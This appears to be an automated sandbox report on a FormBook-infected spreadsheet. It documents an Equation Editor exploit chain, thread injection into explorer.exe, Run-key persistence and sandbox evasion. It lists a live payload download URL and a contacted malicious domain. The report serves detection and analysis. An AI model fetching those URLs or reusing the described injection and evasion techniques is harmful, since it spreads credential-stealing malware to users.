      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0044AFA4 NtdllDefWindowProc_A,GetCapture,9_2_0044AFA4
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00466DB4 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,9_2_00466DB4
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00466E64 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,9_2_00466E64
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0045B7EC GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,9_2_0045B7EC
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0043D9D0 NtdllDefWindowProc_A,9_2_0043D9D0
      Source: vbc.exe.2.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
      Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
      Source: Zxsdvph.exe.4.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
      Source: vbc.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: Zxsdvph.exe.4.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\Public\vbc.exe, Section loaded: msmpcom.dll
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Section loaded: msmpcom.dll
      Source: C:\Users\Public\vbc.exe, Memory allocated: 76F90000 page execute and read and write
      Source: C:\Users\Public\vbc.exe, Memory allocated: 76E90000 page execute and read and write
      Source: C:\Users\Public\vbc.exe, Memory allocated: 72480000 page execute and read and write
      Source: C:\Users\Public\vbc.exe, Memory allocated: 72480000 page no access
      Source: C:\Users\Public\vbc.exe, Memory allocated: 72480000 page read and write
      Source: C:\Users\Public\vbc.exe, Memory allocated: 72481000 page read and write
      Source: C:\Windows\SysWOW64\DpiScaling.exe, Memory allocated: 76F90000 page execute and read and write
      Source: C:\Windows\SysWOW64\DpiScaling.exe, Memory allocated: 76E90000 page execute and read and write
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Memory allocated: 76F90000 page execute and read and write
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Memory allocated: 76E90000 page execute and read and write
      Source: C:\Users\Public\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exe, Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
      Source: C:\Windows\explorer.exe, Process created: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe 'C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe'
      Source: C:\Windows\explorer.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Desktop\~$Swift.xlsx
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRF028.tmp
      Source: classification engine, Classification label: mal100.troj.expl.evad.winXLSX@8/21@6/1
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_004709EC CoCreateInstance,9_2_004709EC
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_0049FF2C EntryPoint,GetDiskFreeSpaceExA,9_2_0049FF2C
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_0042982C GetLastError,FormatMessageA,9_2_0042982C
      Source: C:\Users\Public\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_0041C244 FindResourceA,9_2_0041C244
      Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp, Binary or memory string: .VBPud<_
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\Public\vbc.exe, File read: C:\Windows\System32\drivers\etc\hosts
      Source: Window Recorder, Window detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wntdll.pdb source: DpiScaling.exe
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249A3BA pushfd ; ret 7_2_7249A3BB
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249B83B push eax; ret 7_2_7249B8A2
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249B832 push eax; ret 7_2_7249B838
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249B89C push eax; ret 7_2_7249B8A2
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_72486907 push 00000060h; retf 7_2_7248691C
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249A11B push ecx; ret 7_2_7249A11C
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_72499E43 push 0000007Eh; iretd 7_2_72499E45
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7248EFC6 push cs; ret 7_2_7248EFCC
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249B7E5 push eax; ret 7_2_7249B838
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_724954EE pushad ; retf 7_2_724954F0
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0259DFA1 push ecx; ret 7_2_0259DFB4
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00452658 push 004526E5h; ret 9_2_004526DD
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0046A054 push ecx; mov dword ptr [esp], ecx9_2_0046A059
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00434010 push 0043405Ch; ret 9_2_00434054
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_004540CC push 004540F8h; ret 9_2_004540F0
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0047208C push 004720B8h; ret 9_2_004720B0
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0041A0AC push eax; iretd 9_2_0041A0AD
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0041A19C push eax; iretd 9_2_0041A19D
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00426248 push 004262F3h; ret 9_2_004262EB
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0041A250 push eax; iretd 9_2_0041A251
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0047223C push ecx; mov dword ptr [esp], edx9_2_00472241
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0048C2F0 push 0048C31Ch; ret 9_2_0048C314
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_004262F8 push 00426388h; ret 9_2_00426380
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0045C2A4 push 0045C30Fh; ret 9_2_0045C307
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_004402A0 push 004402F9h; ret 9_2_004402F1
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0041A34C push eax; iretd 9_2_0041A3DD
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0044033C push 00440374h; ret 9_2_0044036C
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_004403D0 push 004403FCh; ret 9_2_004403F4
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0043C3EC push 0043C418h; ret 9_2_0043C410
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00416450 push ecx; mov dword ptr [esp], eax9_2_00416453
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0043C45C push 0043C488h; ret 9_2_0043C480
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0045200C SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,9_2_0045200C
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exe, File created: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

      Boot Survival:

      Drops PE files to the user root directory
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exe, Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Zxsdvph
      Source: C:\Users\Public\vbc.exe, Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00466698 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,9_2_00466698
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0044C6C8 IsIconic,GetCapture,9_2_0044C6C8
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00466DB4 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,9_2_00466DB4
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00466E64 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,9_2_00466E64
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0044CF7C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,9_2_0044CF7C
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_004635DC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,9_2_004635DC
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0044D8A0 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,9_2_0044D8A0
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0042FFC4 IsIconic,GetWindowPlacement,GetWindowRect,9_2_0042FFC4
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0045200C SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,9_2_0045200C
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exe, Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exe, Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Windows\SysWOW64\DpiScaling.exe, RDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\DpiScaling.exe, RDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Contains functionality to detect sleep reduction / modifications
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_004412A89_2_004412A8
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1580, Thread sleep time: -180000s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 1256, Thread sleep time: -300000s >= -30000s
      Source: C:\Windows\SysWOW64\DpiScaling.exe, Code function: 7_2_724888D0 rdtsc 7_2_724888D0
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,9_2_00465B98
      Source: C:\Windows\SysWOW64\DpiScaling.exe, Process information queried: ProcessInformation
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_00429DC8 GetSystemInfo,9_2_00429DC8
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_00409218 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,9_2_00409218
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_00405AA4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,9_2_00405AA4
      Source: explorer.exe, 00000008.00000000.688659406.000000000457A000.00000004.00000001.sdmp, Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp, Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000008.00000000.688659406.000000000457A000.00000004.00000001.sdmp, Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 00000008.00000000.646524780.000000000457A000.00000004.00000001.sdmp, Binary or memory string: pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
      Source: explorer.exe, 00000008.00000000.636828828.000000000029B000.00000004.00000020.sdmp, Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
      Source: explorer.exe, 00000008.00000000.688904749.00000000045D6000.00000004.00000001.sdmp, Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_0045200C SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,9_2_0045200C
      Source: C:\Windows\SysWOW64\DpiScaling.exe, Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\DpiScaling.exe, Code function: 7_2_025A26F8 mov eax, dword ptr fs:[00000030h]7_2_025A26F8
      Source: C:\Windows\SysWOW64\DpiScaling.exe, Process queried: DebugPort
      Source: C:\Windows\SysWOW64\DpiScaling.exe, Code function: 7_2_02590048 NtProtectVirtualMemory,LdrInitializeThunk,7_2_02590048

      HIPS / PFW / Operating System Protection Evasion:

      Maps a DLL or memory area into another process
      Source: C:\Windows\SysWOW64\DpiScaling.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Queues an APC in another process (thread injection)
      Source: C:\Windows\SysWOW64\DpiScaling.exe Thread APC queued: target process: C:\Windows\explorer.exe
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Windows\SysWOW64\DpiScaling.exe Thread register set: target process: 1764
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
      Source: DpiScaling.exe, 00000007.00000002.702380384.0000000000C00000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.637320640.0000000000750000.00000002.00020000.sdmp, Zxsdvph.exe, 00000009.00000002.686095205.0000000000840000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
      Source: DpiScaling.exe, 00000007.00000002.702380384.0000000000C00000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.637320640.0000000000750000.00000002.00020000.sdmp, Zxsdvph.exe, 00000009.00000002.686095205.0000000000840000.00000002.00020000.sdmp Binary or memory string: !Progman
      Source: DpiScaling.exe, 00000007.00000002.702380384.0000000000C00000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.637320640.0000000000750000.00000002.00020000.sdmp, Zxsdvph.exe, 00000009.00000002.686095205.0000000000840000.00000002.00020000.sdmp Binary or memory string: Program Manager<
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,9_2_00405C7C
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: GetLocaleInfoA,9_2_0040C2D4
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: GetLocaleInfoA,9_2_0040C320
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: GetLocaleInfoA,9_2_004065C4
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: GetLocaleInfoA,GetACP,9_2_0040DA20
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,9_2_00405D87
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0040ACD8 GetLocalTime,9_2_0040ACD8
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00452658 GetVersion,9_2_00452658

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara match File source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match File source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match File source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

      Yara detected FormBook
      Source: Yara match File source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match File source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match File source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Native API 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 11 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Exploitation for Client Execution 13 | Application Shimming 1 | Application Shimming 1 | Obfuscated Files or Information 3 | LSASS Memory | File and Directory Discovery 2 | Remote Desktop Protocol | Screen Capture 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Registry Run Keys / Startup Folder 1 | Process Injection 312 | Software Packing 1 | Security Account Manager | System Information Discovery 116 | SMB/Windows Admin Shares | Input Capture 11 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 1 | DLL Side-Loading 1 | NTDS | Security Software Discovery 241 | Distributed Component Object Model | Clipboard Data 2 | Scheduled Transfer | Application Layer Protocol 122 | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 111 | LSA Secrets | Virtualization/Sandbox Evasion 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Modify Registry 1 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 2 | DCSync | Application Window Discovery 11 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 312 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

      Behavior Graph

      [Figure: behavior graph, ID 502159, sample Swift.xlsx, start date 13/10/2021, architecture WINDOWS, score 100. Process chain shown: EQNEDT32.EXE -> vbc.exe -> DpiScaling.exe -> explorer.exe (injected) -> Zxsdvph.exe.]

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      Source | Detection | Scanner | Label
      7.0.DpiScaling.exe.72480000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
      9.2.Zxsdvph.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
      7.2.DpiScaling.exe.72480000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

      Domains

      No Antivirus matches

      URLs

      Source | Detection | Scanner | Label
      http://java.sun.com | 0% | Virustotal |
      http://java.sun.com | 0% | Avira URL Cloud | safe
      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
      http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
      http://192.3.222.155/008008/vbc.exe | 0% | Avira URL Cloud | safe
      http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
      http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
      http://www.%s.comPA | 0% | URL Reputation | safe
      www.septemberstockevent200.com/ht08/ | 0% | Avira URL Cloud | safe
      http://java.w | 0% | Avira URL Cloud | safe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
      http://treyresearch.net | 0% | URL Reputation | safe
      http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      hqpyda.bl.files.1drv.com | unknown | unknown | false | | high
      onedrive.live.com | unknown | unknown | false | | high

          Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      http://192.3.222.155/008008/vbc.exe | true | Avira URL Cloud: safe | unknown
      www.septemberstockevent200.com/ht08/ | true | Avira URL Cloud: safe | low

          URLs from Memory and Binaries


                                Contacted IPs

                                Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      192.3.222.155 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:502159
                                Start date:13.10.2021
                                Start time:17:04:08
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 11m 15s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:Swift.xlsx
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:9
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winXLSX@8/21@6/1
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 54.1% (good quality ratio 52.4%)
                                • Quality average: 79.6%
                                • Quality standard deviation: 26.9%
                                HCA Information:
                                • Successful, ratio: 61%
                                • Number of executed functions: 63
                                • Number of non-executed functions: 231
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .xlsx
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.43.13, 13.107.42.12, 13.107.42.13
                                • Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-bl-files-brs.onedrive.akadns.net, odc-bl-files-geo.onedrive.akadns.net, l-0004.dc-msedge.net
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

      Time | Type | Description
      17:04:43 | API Interceptor | 85x Sleep call for process: EQNEDT32.EXE modified
      17:05:57 | API Interceptor | 124x Sleep call for process: vbc.exe modified
      17:06:05 | API Interceptor | 3x Sleep call for process: DpiScaling.exe modified
      17:06:07 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Zxsdvph C:\Users\Public\Libraries\hpvdsxZ.url
      17:06:08 | API Interceptor | 100x Sleep call for process: explorer.exe modified
